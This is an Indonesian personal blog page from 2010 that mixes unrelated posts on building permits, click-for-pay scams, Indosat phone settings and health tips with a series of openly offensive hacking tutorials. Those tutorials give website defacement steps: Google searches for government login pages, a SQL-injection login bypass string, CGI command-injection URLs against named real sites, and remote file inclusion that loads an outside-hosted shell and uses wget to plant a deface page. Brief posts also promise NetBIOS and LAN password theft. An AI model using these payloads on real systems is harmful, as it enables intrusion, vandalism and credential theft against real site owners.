BERAWAL DARI KETERBATASAN,DAN MUNCUL DALAM KHAYALAN ALAM PIKIRAN DAN MENDORONG KEINGINAN YANG DIIKUTI DENGAN USAHA UNTUK MEWUJUDKANNYA.
JIKALAU KAU NANTI LEBIH TINGGI DARI RAJA NIKMATI HIDUP DENGAN BLANGKON DIKEPALA


Korek - Korek Disini

Selasa, 19 Januari 2010

Mengurus IMB



Bagi Anda yang berminat silahkan kontak ke : Selamet...0856.1515.516

Masyarakat seringkali malas mengurus IMB karena mitos banyak “biaya siluman.” Padahal IMB bertujuan menciptakan tata letak bangunan dan lingkungan yang teratur, sesuai peruntukan lahan.

Daftar PTC Bohong ( Scam )

Capek Capek Ngeklik Iklan ehhh ternyata Gak di bayar Capekkkk Dehhhh...:D
Di bawah ini adalah List PTC Scam,Gak Usah gabung kalau gak pengen capek klik iklannya
dan kalau udah gabung mendingan stop klik aja dehhh..daripada sia sia:D
Tapi kalau memang bukan scam kasih komen yaahhh..
data di bawah ini di ambil dari blog http://suspect-sites.blogspot.com/

In this list there are sites which have:

Minggu, 17 Januari 2010

Dapatkan dollar hanya meng klik iklan.

well.....mungkin ada banyak yang tau tentang bisnis ptc khususnya program yang di berikan oleh neobux.
syarat untuk mengikuti program ini adalah :
-harus mempunyai internet
-rajin2 klik agar dollar terus menggalir
-uda itu aja.::hihi::::hihi::

Mendulang Dollar Dengan Online Di Internet

Pernahkah anda menghitung berapa lama anda online di Internet? Wah pastinya udah banyak waktu yang anda habiskan. Lalu pernahkah anda bayangkan dengan waktu online yang begitu banyak tersebut dapat menghasilkan dollar? Ya, hanya dengan online diinternet, maka anda dibayar.

Jumat, 15 Januari 2010

Setting GPRS, MMS, WAP dan BroadBand Indosat


OTA Setting
Manual Setting
GPRS Volume Based
Ketik: GPRS merk_HP Type_HP
Contoh: gprs nokia n70
Kirim ke 3000 (gratis)
APN: indosatgprs
User : indosat
Pass : indosat
Proxy : 10.19.19.19
Port : 8080
Homepage : http://wap.indosat.com

GPRS Duration Based
Ketik: durasi merk_HP Type_HP
Contoh: gprs nokia n70

Kirim ke 3000 (gratis)
APN: indosatgprs
User : indosat@durasi
Pass : indosat@durasi
Proxy : 10.19.19.19
Port : 8080
Homepage : http://wap.indosat.com

MMS
Ketik: MMS merk_HP Type_HP
Contoh: MMS nokia n70

Kirim ke 3000 (gratis)
APN: indosatmms
User : indosat
Pass : indosat
Proxy : 10.19.19.19
Port : 8080
Homepage : http://mmsc.indosat.com

Broadband *
Ketik: 3G merk_HP Type_HP
Contoh: 3G nokia E90 Kirim ke 3000
APN: indosat3g
User : indosat
Pass : indosat
Proxy : 10.19.19.19
Port : 8080
Homepage : http://wap3g.indosat.com

WAP StarOne

Proxy: 192.168.50.60
Port: 9401 (WAP 2.0), 9201 (WAP 1.0)
User: wap
Pass: wap
Homepage: http://wap.indosat.com
Daftar Handset yang support OTA setting

*) APN indosat3g hanya bisa digunakan untuk handset-handset yang support HSDPA / UMTS dan menggunakan kartu Indosat 3.5G BroadBand

Rabu, 13 Januari 2010

Ketika Perokok Berhenti Merokok

sebelumnya sori kalo repost...
tapi kalo repost untuk kebaikan... kayaknya gapapa

dan kalo dirasa thread ini berguna
mohon di RATE terlebih dahulu... biar yg lain jg baca... Thanks

ILmunyanya..Mandi..

wow, ternyata mandi juga ada ilmunya ya..
ngomong2 bagaimana dg kebiasaan memandikan anak, apakah mandi dulu baru makan atau makan dulu baru mandi?
kira-kira bagaimana ya? inilah caranya:

Kebiasaan orang MANDI adalah

Selasa, 12 Januari 2010

langkah nya

Diposkan oleh Retro_Skater di 10:26
udah lama nih udah nda nge posting tentang hacking maklum lagi sibuk
cari dollar dan di sini saya akan menjelaskan berbagi macan jenis deface
yang skarang di pergunakan para hacked indo untuk hack website orang
malaysia untuk membela manohara....! (seperti emould.com.cn dan hacked by x-blank )

cara membuat html

cara membuat html :
Buka ms.frontpage, klik tab format diatas, trus pilih backgrounds,
trus pilih enable hyperlink, trus pilih color background,
pilih warna hitam, trus ok
Trus pilih tab center yg

guestbook

Deface guestbook (buku tamu)
Dengan menggunakan teknik SQL Injection,kita bisa mendeface guestbook
(bukutamu) baik file php,asp,cfm,cgi,html dan kawan2. Ingat2 nggak
semua guestbook bisa dideface.
Langkah2 nya

win 98

Deface asp/iis dgn menggunakan win 98
1. Klik Icon “My Computer” di komputer kamu.
2. Cari Icon “Web Folder” didalam My Computer Itu.
3. Klick lagi Icon “Add web folder” dan akan muncul
“Type the location to add”.

asp -->> sql

deface asp dgn sql injection
1. buka browsing/url www.google.co.id
2. ketik site:go.id login.asp
misal nya kita dapat target www.namatarget.com/login.asp
3. username dan pass ketik ‘or”=’
4. buka satu persatu file yg ada disana
5. cari file yg bisa kita ubah/deface
6. buka browsing/url baru trus ketikkan target tadi misal nya www.namatarget.com
7. kalo hasil nya belum ada, klik tab refresh disamping url lu

lima

deface cgi II
http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|id|
http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|pwd|
http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|echo “Hacked by psychophysiological. Hey admin…do you a need help ? Matrix.Dal.Net - surabayahack” > /usr/home/web/users/a0004481/html/adspro/jh.html|
http://www.sports-media.org/adspro/jh.html

http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm << page="top.htm|pwd|">>>>>>> usr/home/web/users/a0004481/html/adspro/cgi-bin/adspro
usr/home/web/users/a0004481/html/adspro/cgi-bin/adspro <<<<<<<< html =""> http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|whereis%20index.html|
http://www.enveracruz.com.mx/mercadito.cgi?page=../ventas.html|echo “Hacked by psychophysiological. Hey admin…do you a need help ? Matrix.Dal.Net - surabayahack”>decae.html|&cart_id=9721374.5730
http://samedesign.us/cgi-bin/web_store.cgi?page=about.html|echo%20

empat

deface cgi
https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html <<< page="coart_frontpage.html|pwd|" page="coart_frontpage.html|wget" nya =""> https://bronte.netpresence.com.au/~wolfsecu/arai.html
…/home/sites/site52/users/wolfsecu/web/coartcds/Web_store <<< target =""> allinurl:*.cgi * page:.*html+site:.us atau http://www.google.co.id/search?q=allinurl:*.cgi%3Fpage%3D*.html+site:.com&hl=id&lr=&start=10&sa=N
target nya musti file html diujung nya kalo mau tambahin |pwd|

tiga

http://dillon2.edumail.us/index.php?name=PNphpBB2&file=index&c=4
itu file aslinya
modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
itu bug nya
http://dillon2.edumail.us/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/sandal_karet/script/arai2.jpg?
jadi index.php?name=PNphpBB2&file=index&c=4 dibuang
cara inject nya http://dillon2.edumail.us/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/sandal_karet/script/arai2.jpg?
dikotak command unix masukin
wget http://geocities.com/nusantarajaya_2004/arai.html
cara liat nya http://dillon2.edumail.us/modules/PNphpBB2/includes/arai.html

http://www.narnia-chroniken.de <<< phpbb_root_path="http://geocities.com/sandal_karet/script/arai2.jpg?">

dua

deface php dgn injection II
http://www.giphted.com/index.php?siteName=pics%2Fom%2Findex.php
itu file aslinya
http://www.giphted.com/index.php?siteName=http://www.geocities.com/sandal_karet/script/arai2.jpg?
dikotak masukin: pwd
jadi pics%2Fom%2Findex.php dibuang
cara inject nya http://www.giphted.com/index.php?siteName=http://www.geocities.com/sandal_karet/script/arai2.jpg?
dikotak masukin: wget http://www.geocities.com/nusantarajaya_2004/arai.html -O /export/home/beangyy/www/arai.html
cara liat nya http://www.giphted.com/arai.html

Walah..!

Seorang temanku tiba2 terkejut ketika dia sedang Chating, pesan yang terkirim ke teman chatnya berbeda dengan apa yang dia ketik. Ternyata seseorang telah mengendalikan komputernya lewat computer lain dan mengetikan kata-kata jorok dikomputernya. Alhasil temanku kecewa karena lawan chatnya kabur karena merasa diperlakukan tidak baik olehnya.

satu

deface phpbb/forum
http://www.bpmpt.go.id/forum/index.php
itu file aslinya
includes/db.php?phpbb_root_path=
itu bug nya

LAN......?

Port 139 merupakan port yang di gunakan windows dalam sistem jaringan komputernya dengan menjalankan Netbios (Network Basic Input Output System). User yang bisa mengenali dan memanfaatkan port tersebut, akan bisa menggali informasi detail mengenai data jaringan termasuk password folder yang di share serta password administrator.

Kita akan menggunakan

Buat belajar

Cara hacking via LAN (untuk curi pass orang2 yang lagi browsing)
Pertama-tama sorry kalo repost karena teknik ini bukanlah teknik yang fresh di dunia hacking tapi teknik ini belum basi karena sampai saat ini masih dapat digunakan karena sebagian besar jaringan meggunakan jaringan hub & switch yang tidak terenkripsi.
Mengapa tidak terenkripsi?

Senin, 11 Januari 2010

Minggu, 10 Januari 2010